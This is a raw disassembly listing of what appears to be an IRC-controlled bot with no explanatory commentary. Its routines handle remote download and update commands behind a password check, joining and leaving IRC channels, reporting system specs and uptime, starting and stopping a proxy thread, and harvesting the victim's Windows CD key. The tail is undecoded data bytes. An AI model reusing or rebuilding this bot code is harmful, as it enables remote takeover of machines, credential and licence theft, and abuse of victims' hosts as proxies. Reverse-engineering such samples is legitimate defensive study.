loc_401846:				; CODE XREF: sub_40177B+C4j
		test	eax, eax
		jnz	loc_4019C8
		push	327h
		push	eax
		lea	eax, [ebp-4B8h]
		push	eax
		call	sub_408130
		push	dword ptr [ebp-4BCh]
		mov	esi, offset dword_421C1C
		push	esi
		mov	edi, 0FFh
		lea	eax, [ebp-4B8h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-4B8h]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_40188A:				; CODE XREF: sub_40177B+114j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40188A
		push	dword ptr [ebp-4C4h]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-4B8h],	dl
		lea	eax, [ebp-3B8h]
		push	22h
		push	eax
		call	sub_40307C
		lea	eax, [ebp-3B8h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4018BB:				; CODE XREF: sub_40177B+145j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4018BB
		mov	ebx, [ebp-4C0h]
		push	dword ptr [ebx+8]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-3B8h],	dl
		lea	eax, [ebp-395h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-395h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4018EE:				; CODE XREF: sub_40177B+178j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4018EE
		push	dword ptr [ebx+0Ch]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-395h],	dl
		lea	eax, [ebp-295h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-295h]
		add	esp, 10h
		lea	esi, [eax+1]

loc_40191B:				; CODE XREF: sub_40177B+1A5j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_40191B
		sub	eax, esi
		mov	[ebp+eax-295h],	cl
		mov	al, [ebp+8]
		mov	[ebp-192h], al
		mov	al, [ebp+0Ch]
		push	4
		mov	[ebp-193h], al
		pop	eax
		cmp	[ebp+1Ch], eax
		jl	short loc_40198B
		mov	[ebp-4BCh], eax

loc_40194B:				; CODE XREF: sub_40177B+203j
		mov	eax, [ebx+eax*4]
		push	3
		mov	edi, offset dword_421C20
		mov	esi, eax
		pop	ecx
		xor	edx, edx
		repe cmpsb
		jz	short loc_401982
		mov	esi, eax
		push	2
		mov	edi, offset dword_421C24
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_401982
		mov	eax, [ebp-4BCh]
		inc	eax
		cmp	eax, [ebp+1Ch]
		mov	[ebp-4BCh], eax
		jle	short loc_40194B
		jmp	short loc_401992
; ---------------------------------------------------------------------------

loc_401982:				; CODE XREF: sub_40177B+1E1j
					; sub_40177B+1F1j
		mov	byte ptr [ebp-195h], 1
		jmp	short loc_401992
; ---------------------------------------------------------------------------

loc_40198B:				; CODE XREF: sub_40177B+1C8j
		mov	byte ptr [ebp-195h], 0

loc_401992:				; CODE XREF: sub_40177B+205j
					; sub_40177B+20Ej
					; DATA XREF: ...
		push	8
		mov	byte ptr [ebp-194h], 0
		call	sub_4035D9
		pop	ecx
		mov	[ebp-4C0h], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_4019EB
		push	offset sub_41C4FC
		lea	ecx, [ebp-4B8h]
		mov	edi, offset dword_421C28
		mov	esi, eax
		call	sub_414D0E
		jmp	short loc_4019EB
; ---------------------------------------------------------------------------

loc_4019C8:				; CODE XREF: sub_40177B+CDj
		push	offset aDlAuthFailure_ ; "DL: Auth Failure."
		push	dword ptr [ebp-4BCh]
		jmp	short loc_4019DB
; ---------------------------------------------------------------------------

loc_4019D5:				; CODE XREF: sub_40177B+2Ej
		push	offset aDlInvalidArgum ; "DL: Invalid Arguments"
		push	eax

loc_4019DB:				; CODE XREF: sub_40177B+258j
		push	dword ptr [ebp+0Ch]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h

loc_4019EB:				; CODE XREF: sub_40177B+96j
					; sub_40177B+232j ...
		call	sub_404C3F
		retn	1Ch
sub_40177B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4019F3	proc near		; DATA XREF: jlrllt49:off_421C90o
		push	4B8h
		mov	eax, offset loc_41CF7E
		call	sub_404BF5
		cmp	dword ptr [ebp+1Ch], 3
		mov	eax, [ebp+10h]
		mov	edi, [ebp+20h]
		mov	[ebp-4C4h], eax
		mov	eax, [ebp+18h]
		mov	[ebp-4C0h], eax
		mov	[ebp-4BCh], edi
		jl	loc_401BFF
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp-18Fh]
		push	ebx
		push	eax
		mov	[ebp-190h], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp-0CFh]
		push	ebx
		push	eax
		mov	[ebp-0D0h], bl
		call	sub_408130
		push	dword ptr [edi+4]
		lea	edi, [ebp-190h]
		call	sub_41C1B3
		push	0C0h
		lea	esi, [ebp-0D0h]
		mov	ebx, offset aDDAVvAEzEAZvvD ; "ФԤؠҢ٠ԥԥ٠ҧ"...
		call	sub_41A33D
		add	esp, 20h
		cmp	byte ptr [ebp+8], 0
		jz	short loc_401A8F
		cmp	byte_42740A, 0
		jz	loc_401C15

loc_401A8F:				; CODE XREF: sub_4019F3+8Dj
		lea	ecx, [ebp-0D0h]
		lea	eax, [ebp-190h]

loc_401A9B:				; CODE XREF: sub_4019F3+C0j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_401AB9
		test	dl, dl
		jz	short loc_401AB5
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_401AB9
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_401A9B

loc_401AB5:				; CODE XREF: sub_4019F3+B0j
		xor	eax, eax
		jmp	short loc_401ABE
; ---------------------------------------------------------------------------

loc_401AB9:				; CODE XREF: sub_4019F3+ACj
					; sub_4019F3+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_401ABE:				; CODE XREF: sub_4019F3+C4j
		test	eax, eax
		jnz	loc_401BF2
		push	327h
		push	eax
		lea	eax, [ebp-4B8h]
		push	eax
		call	sub_408130
		push	dword ptr [ebp-4C0h]
		mov	esi, offset dword_421C1C
		push	esi
		mov	edi, 0FFh
		lea	eax, [ebp-4B8h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-4B8h]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_401B02:				; CODE XREF: sub_4019F3+114j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B02
		push	dword ptr [ebp-4C4h]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-4B8h],	dl
		lea	eax, [ebp-3B8h]
		push	22h
		push	eax
		call	sub_40307C
		lea	eax, [ebp-3B8h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B33:				; CODE XREF: sub_4019F3+145j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B33
		mov	ebx, [ebp-4BCh]
		push	dword ptr [ebx+8]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-3B8h],	dl
		lea	eax, [ebp-395h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-395h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B66:				; CODE XREF: sub_4019F3+178j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B66
		push	dword ptr [ebx+0Ch]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-395h],	dl
		lea	eax, [ebp-295h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-295h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B93:				; CODE XREF: sub_4019F3+1A5j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B93
		sub	eax, ecx
		mov	[ebp+eax-295h],	dl
		mov	al, [ebp+8]
		mov	[ebp-192h], al
		mov	al, [ebp+0Ch]
		push	8
		mov	[ebp-193h], al
		mov	byte ptr [ebp-195h], 1
		mov	byte ptr [ebp-194h], 1
		call	sub_4035D9
		pop	ecx
		mov	[ebp-4BCh], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_401C15
		push	offset sub_41C4FC
		lea	ecx, [ebp-4B8h]
		mov	edi, offset dword_421C28
		mov	esi, eax
		call	sub_414D0E
		jmp	short loc_401C15
; ---------------------------------------------------------------------------

loc_401BF2:				; CODE XREF: sub_4019F3+CDj
		push	offset aUpdAuthFailure ; "UPD: Auth Failure."
		push	dword ptr [ebp-4C0h]
		jmp	short loc_401C05
; ---------------------------------------------------------------------------

loc_401BFF:				; CODE XREF: sub_4019F3+2Ej
		push	offset aUpdInvalidArgu ; "UPD: Invalid Arguments."
		push	eax

loc_401C05:				; CODE XREF: sub_4019F3+20Aj
		push	dword ptr [ebp+0Ch]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h

loc_401C15:				; CODE XREF: sub_4019F3+96j
					; sub_4019F3+1E4j ...
		call	sub_404C3F
		retn	1Ch
sub_4019F3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401C1D	proc near		; DATA XREF: jlrllt49:off_421D04o

arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		push	edi
		xor	edi, edi
		inc	edi
		cmp	[ebp+arg_14], edi
		jl	loc_401CF7
		push	esi
		push	1F8h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		push	eax
		push	0
		push	esi

loc_401C44:				; DATA XREF: p9xindpz:00490C45o
		call	sub_408130
		add	esp, 14h
		cmp	[ebp+arg_14], edi
		jnz	short loc_401C81
		mov	eax, [ebp+arg_18]
		push	dword ptr [eax+4]
		push	offset dword_421C1C
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 10h
		lea	edx, [eax+1]

loc_401C73:				; CODE XREF: sub_401C1D+5Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_401C73
		sub	eax, edx
		mov	[eax+esi], cl
		jmp	short loc_401CDB
; ---------------------------------------------------------------------------

loc_401C81:				; CODE XREF: sub_401C1D+32j
		jl	short loc_401CDB
		push	ebx
		mov	ebx, [ebp+arg_18]

loc_401C87:				; CODE XREF: sub_401C1D+BBj
		cmp	edi, 1
		jnz	short loc_401CA8
		push	dword ptr [ebx+4]
		push	offset dword_421C1C
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_401CC3
; ---------------------------------------------------------------------------

loc_401CA8:				; CODE XREF: sub_401C1D+6Dj
		push	dword ptr [ebx+edi*4]
		push	esi
		push	offset dword_421C94
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		add	esp, 14h

loc_401CC3:				; CODE XREF: sub_401C1D+89j
		mov	eax, esi
		lea	ecx, [eax+1]

loc_401CC8:				; CODE XREF: sub_401C1D+B0j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401CC8
		sub	eax, ecx
		inc	edi
		cmp	edi, [ebp+arg_14]
		mov	[eax+esi], dl
		jle	short loc_401C87
		pop	ebx

loc_401CDB:				; CODE XREF: sub_401C1D+62j
					; sub_401C1D:loc_401C81j
		push	esi
		push	offset dword_421C9C
		mov	edi, offset dword_428D1C
		call	sub_417F4C
		push	esi
		call	sub_403129
		add	esp, 0Ch
		pop	esi
		jmp	short loc_401D07
; ---------------------------------------------------------------------------

loc_401CF7:				; CODE XREF: sub_401C1D+Aj
		push	offset aQuitIrnPowered ; "QUIT :Irn Powered\r\n"
		mov	edi, offset dword_428D1C
		call	sub_417F4C
		pop	ecx

loc_401D07:				; CODE XREF: sub_401C1D+D8j
		pop	edi
		pop	ebp
		retn	1Ch
sub_401C1D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401D0C	proc near		; DATA XREF: jlrllt49:off_421D0Co

arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_14], 1
		push	edi
		jl	short loc_401D4A
		cmp	[ebp+arg_14], 2
		mov	eax, [ebp+arg_18]
		mov	edi, offset dword_428D1C
		jl	short loc_401D39
		push	dword ptr [eax+8]
		push	dword ptr [eax+4]
		push	offset aJoinSS	; "JOIN	%s %s\r\n"
		call	sub_417F4C
		add	esp, 0Ch
		jmp	short loc_401D62
; ---------------------------------------------------------------------------

loc_401D39:				; CODE XREF: sub_401D0C+16j
		push	dword ptr [eax+4]
		push	offset aJoinS	; "JOIN	%s\r\n"
		call	sub_417F4C
		pop	ecx
		pop	ecx
		jmp	short loc_401D62
; ---------------------------------------------------------------------------

loc_401D4A:				; CODE XREF: sub_401D0C+8j
		push	offset aIInsufficientA ; "I: Insufficient Arguments."
		push	[ebp+arg_10]
		push	[ebp+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h

loc_401D62:				; CODE XREF: sub_401D0C+2Bj
					; sub_401D0C+3Cj
		pop	edi
		pop	ebp
		retn	1Ch
sub_401D0C	endp


; =============== S U B	R O U T	I N E =======================================



sub_401D67	proc near		; DATA XREF: jlrllt49:off_421D14o

arg_4		= dword	ptr  8
arg_10		= dword	ptr  14h
arg_14		= dword	ptr  18h
arg_18		= dword	ptr  1Ch

		cmp	[esp+arg_14], 1
		jl	short loc_401D8A
		mov	eax, [esp+arg_18]
		push	edi
		push	dword ptr [eax+4]
		mov	edi, offset dword_428D1C
		push	offset aPartS	; "PART	%s\r\n"
		call	sub_417F4C
		pop	ecx
		pop	ecx
		pop	edi
		jmp	short locret_401DA4
; ---------------------------------------------------------------------------

loc_401D8A:				; CODE XREF: sub_401D67+5j
		push	offset aIInsufficientA ; "I: Insufficient Arguments."
		push	[esp+4+arg_10]
		push	[esp+8+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h

locret_401DA4:				; CODE XREF: sub_401D67+21j
		retn	1Ch
sub_401D67	endp


; =============== S U B	R O U T	I N E =======================================



sub_401DA7	proc near		; DATA XREF: jlrllt49:off_421D78o

arg_4		= dword	ptr  8
arg_10		= dword	ptr  14h

		call	sub_419A20
		push	dword_42890C
		push	dword_428908
		push	dword_428904
		push	dword_428900
		push	dword_4288FC
		push	dword_4288F8
		push	offset aSystemUptimeI6 ; "System Uptime: %I64u Days, %I64u Hours,"...
		push	[esp+1Ch+arg_10]
		push	[esp+20h+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 28h
		retn	1Ch
sub_401DA7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401DED	proc near		; DATA XREF: jlrllt49:off_421D80o

var_118		= dword	ptr -118h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 118h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_10]
		push	ebx
		mov	[ebp+var_118], eax
		push	esi
		push	edi
		xor	eax, eax
		xor	ecx, ecx
		mov	[ebp+var_14], cl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		push	0FFh
		stosb
		push	ecx
		lea	eax, [ebp+var_113]
		push	eax
		mov	[ebp+var_114], cl
		call	sub_408130
		push	dword_428D1C
		lea	esi, [ebp+var_14]
		call	sub_419C46
		push	100h
		lea	esi, [ebp+var_114]
		mov	ebx, offset aDfstcvDsd ; "τ"
		call	sub_41A33D
		mov	eax, esi
		push	eax
		push	dword_4288F4
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aHttpSDS	; "http://%s:%d/%s"
		push	[ebp+var_118]
		push	[ebp+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		mov	ecx, [ebp+var_4]
		add	esp, 30h
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	1Ch
sub_401DED	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401E90	proc near		; DATA XREF: jlrllt49:off_421D88o

var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 104h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		mov	esi, [ebp+arg_10]
		push	0FFh
		lea	eax, [ebp+var_103]
		push	0
		push	eax
		mov	[ebp+var_104], 0
		call	sub_408130
		lea	eax, [ebp+var_104]
		push	eax
		call	sub_414954
		lea	eax, [ebp+var_104]
		push	eax
		push	offset aWindowsCdKeyS ;	"Windows CD Key: %s"
		push	esi
		push	[ebp+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		mov	ecx, [ebp+var_4]
		add	esp, 24h
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn	1Ch
sub_401E90	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401EF9	proc near		; DATA XREF: jlrllt49:off_421DD4o

var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= byte ptr -128h
var_120		= byte ptr -120h
var_20		= word ptr -20h
var_1E		= byte ptr -1Eh
var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	0FFFFFFFFh
		push	offset loc_41CF43
		mov	eax, large fs:0
		push	eax
		sub	esp, 130h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+13Ch+var_14], eax
		push	ebx
		push	esi
		push	edi
		mov	eax, dword_424064
		xor	eax, esp
		push	eax
		lea	eax, [esp+14Ch+var_C]
		mov	large fs:0, eax
		mov	edi, [ebp+arg_10]
		mov	esi, [ebp+arg_18]
		push	104h
		lea	eax, [esp+150h+var_120]
		push	0
		push	eax
		mov	[esp+158h+var_13C], edi
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	offset dword_421C1C
		lea	eax, [esp+154h+var_120]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+15Ch+var_120]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401F76:				; CODE XREF: sub_401EF9+82j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401F76
		mov	ebx, [ebp+arg_4]
		sub	eax, ecx
		cmp	[ebp+arg_14], 1
		mov	[esp+eax+14Ch+var_120],	dl
		mov	[esp+14Ch+var_1E], bl
		jl	short loc_401FAD
		push	dword ptr [esi+4]
		call	sub_404376
		pop	ecx
		push	dword ptr [esi+4]
		mov	word_437388, ax
		call	sub_404376
		pop	ecx
		jmp	short loc_401FB9
; ---------------------------------------------------------------------------

loc_401FAD:				; CODE XREF: sub_401EF9+98j
		mov	ax, word_427408
		mov	word_437388, ax

loc_401FB9:				; CODE XREF: sub_401EF9+B2j
		mov	[esp+14Ch+var_20], ax
		mov	eax, dword_43768C
		mov	eax, [eax]
		mov	[esp+14Ch+var_134], eax
		mov	eax, offset dword_437688
		mov	[esp+14Ch+var_138], eax
		mov	[esp+14Ch+var_130], eax

loc_401FD9:				; CODE XREF: sub_401EF9+11Fj
		mov	eax, dword_43768C
		lea	edi, [esp+14Ch+var_130]
		lea	esi, [esp+14Ch+var_138]
		mov	[esp+14Ch+var_12C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_40201A
		mov	edi, offset off_421D8C
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	4
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_402049
		lea	edi, [esp+14Ch+var_128]
		lea	esi, [esp+14Ch+var_138]
		call	sub_40166F
		jmp	short loc_401FD9
; ---------------------------------------------------------------------------

loc_40201A:				; CODE XREF: sub_401EF9+F8j
		push	8
		call	sub_4035D9
		pop	ecx
		mov	[esp+14Ch+var_13C], eax
		and	[esp+14Ch+var_4], 0
		test	eax, eax
		jz	short loc_402060
		push	offset sub_4147B2
		lea	ecx, [esp+150h+var_120]
		mov	edi, offset off_421D8C
		mov	esi, eax
		call	sub_414D0E
		jmp	short loc_402060
; ---------------------------------------------------------------------------

loc_402049:				; CODE XREF: sub_401EF9+110j
		push	offset aS4AlreadyRunni ; "S4:Already Running"
		push	[esp+150h+var_13C]
		push	ebx
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h

loc_402060:				; CODE XREF: sub_401EF9+137j
					; sub_401EF9+14Ej
		mov	ecx, [esp+14Ch+var_C]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [esp+13Ch+var_14]
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_401EF9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402086	proc near		; DATA XREF: jlrllt49:off_421DDCo

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 18h
		push	esi
		push	edi
		push	dword_428E48
		call	ds:dword_41E280	; closesocket
		mov	eax, dword_43768C
		mov	eax, [eax]
		mov	[esp+20h+var_14], eax
		mov	eax, offset dword_437688
		mov	[esp+20h+var_18], eax
		mov	[esp+20h+var_10], eax

loc_4020B5:				; CODE XREF: sub_402086+6Ej
		mov	eax, dword_43768C
		lea	edi, [esp+20h+var_10]
		lea	esi, [esp+20h+var_18]
		mov	dword ptr [esp+20h+var_C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_402109
		mov	edi, offset off_421D8C
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	4
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [esp+20h+var_18]
		jz	short loc_4020F6
		lea	edi, [esp+20h+var_8]
		call	sub_40166F
		jmp	short loc_4020B5
; ---------------------------------------------------------------------------

loc_4020F6:				; CODE XREF: sub_402086+63j
		call	sub_40164F
		mov	eax, [eax]
		call	sub_414C86
		push	offset aS4ThreadStoppe ; "S4: Thread Stopped"
		jmp	short loc_40210E
; ---------------------------------------------------------------------------

loc_402109:				; CODE XREF: sub_402086+47j
		push	offset aS4NoThreadRunn ; "S4: No Thread	Running"

loc_40210E:				; CODE XREF: sub_402086+81j
		push	[ebp+arg_10]
		push	[ebp+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h
		pop	edi
		pop	esi
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_402086	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402129	proc near		; DATA XREF: jlrllt49:off_421E9Co

var_444		= byte ptr -444h
var_440		= dword	ptr -440h
var_43C		= dword	ptr -43Ch
var_438		= byte ptr -438h
var_430		= dword	ptr -430h
var_42C		= dword	ptr -42Ch
var_418		= byte ptr -418h
var_417		= byte ptr -417h
var_408		= byte ptr -408h
var_407		= byte ptr -407h
var_308		= byte ptr -308h
var_307		= byte ptr -307h
var_208		= byte ptr -208h
var_207		= byte ptr -207h
var_108		= byte ptr -108h
var_107		= byte ptr -107h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 444h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+444h+var_4], eax
		mov	eax, [ebp+arg_10]
		push	ebx
		push	esi
		push	edi
		mov	esi, 0FFh
		push	esi
		mov	[esp+454h+var_43C], eax
		xor	ebx, ebx
		lea	eax, [esp+454h+var_107]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_108], 0
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+454h+var_307]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_308], bl
		call	sub_408130
		xor	eax, eax
		mov	[esp+45Ch+var_418], bl
		lea	edi, [esp+45Ch+var_417]
		stosd
		stosd
		stosd
		stosw
		add	esp, 0Ch
		push	esi
		stosb
		lea	eax, [esp+454h+var_407]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_408], bl
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+454h+var_207]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_208], bl
		call	sub_408130
		add	esp, 0Ch
		push	8
		pop	ecx
		xor	eax, eax
		lea	edi, [esp+450h+var_438]
		rep stosd
		lea	eax, [esp+450h+var_438]
		mov	ebx, 100h
		push	eax
		mov	[esp+454h+var_440], ebx
		call	ds:off_41E098
		mov	edi, [esp+450h+var_430]
		mov	ecx, [esp+450h+var_42C]
		shr	edi, 14h
		shr	ecx, 14h
		mov	eax, edi
		sub	eax, ecx
		push	1
		mov	ecx, ebx
		lea	esi, [esp+454h+var_108]
		mov	dword ptr [esp+454h+var_444], eax
		call	sub_419AD1
		pop	ecx
		call	sub_41B1F3
		push	1
		push	ebx
		lea	esi, [esp+458h+var_308]
		call	sub_419A9F
		push	dword_428D1C
		lea	esi, [esp+45Ch+var_418]
		call	sub_419C46
		add	esp, 0Ch
		lea	eax, [esp+450h+var_440]
		push	eax
		lea	eax, [esp+454h+var_408]
		push	eax
		call	ds:off_41E048
		push	ebx
		lea	eax, [esp+454h+var_208]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		call	sub_419A20
		push	dword_42890C
		lea	eax, [esp+454h+var_208]
		push	dword_428908
		push	dword_428904
		push	dword_428900
		push	dword_4288FC
		push	dword_4288F8
		push	eax
		lea	eax, [esp+46Ch+var_408]
		push	eax
		mov	eax, esi
		push	eax
		lea	eax, [esp+474h+var_308]
		push	eax
		push	edi
		push	dword ptr [esp+47Ch+var_444]
		mov	esi, offset byte_428E50
		push	dword_428F50
		lea	eax, [esp+484h+var_108]
		push	esi
		push	dword_428F54
		push	eax
		push	offset aSystemSCpuIXS@ ; "System: %s [CPU: %i x	%s @ %dMhz] [RAM:"...
		push	[esp+494h+var_43C]
		push	[ebp+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		push	108h
		push	0
		push	esi
		call	sub_408130
		mov	ecx, [esp+4ACh+var_4]
		add	esp, 5Ch
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_402129	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4022EB	proc near		; DATA XREF: jlrllt49:off_421EA4o

var_18		= dword	ptr -18h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_10]
		push	esi
		push	edi
		push	dword_428D1C
		mov	[ebp+var_14], 0
		xor	eax, eax
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp+var_14]
		stosb
		call	sub_419C46
		pop	ecx
		mov	eax, esi
		push	eax
		call	ds:dword_41E264	; inet_addr
		push	2
		mov	[ebp+var_18], eax
		push	4
		lea	eax, [ebp+var_18]
		push	eax
		call	ds:dword_41E224	; gethostbyaddr
		test	eax, eax
		jnz	short loc_402358
		mov	eax, esi
		push	eax
		push	offset aNetIpSHostNA ; "Net: IP: %s Host: N/A"
		push	ebx
		push	[ebp+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 14h
		jmp	short loc_402374
; ---------------------------------------------------------------------------

loc_402358:				; CODE XREF: sub_4022EB+50j
		push	dword ptr [eax]
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aNetIpSHostS ; "Net: IP:	%s Host: %s"
		push	ebx
		push	[ebp+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 18h

loc_402374:				; CODE XREF: sub_4022EB+6Bj
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	1Ch
sub_4022EB	endp

; ---------------------------------------------------------------------------
byte_402385	db 68h,	1Ch, 2		; DATA XREF: jlrllt49:off_421ED0o
		dd 0EB80000h, 0E80041CFh, 2861h, 51C7D83h, 8B187D8Bh, 8C0F2075h
		dd 0E2h, 21468h, 0DC858D00h, 6AFFFFFDh,	79E85000h, 5700005Dh
		dd 421C1CBBh, 0FFBF5300h
		db 0
		db 2 dup(0), 8Dh	; DATA XREF: sub_4900D7+1E4w
		db 85h,	0DCh, 0FDh
		db 0FFh			; DATA XREF: sub_4900D7+1F3w
; ---------------------------------------------------------------------------
		call	dword ptr [edi+50h]
		call	sub_40307C
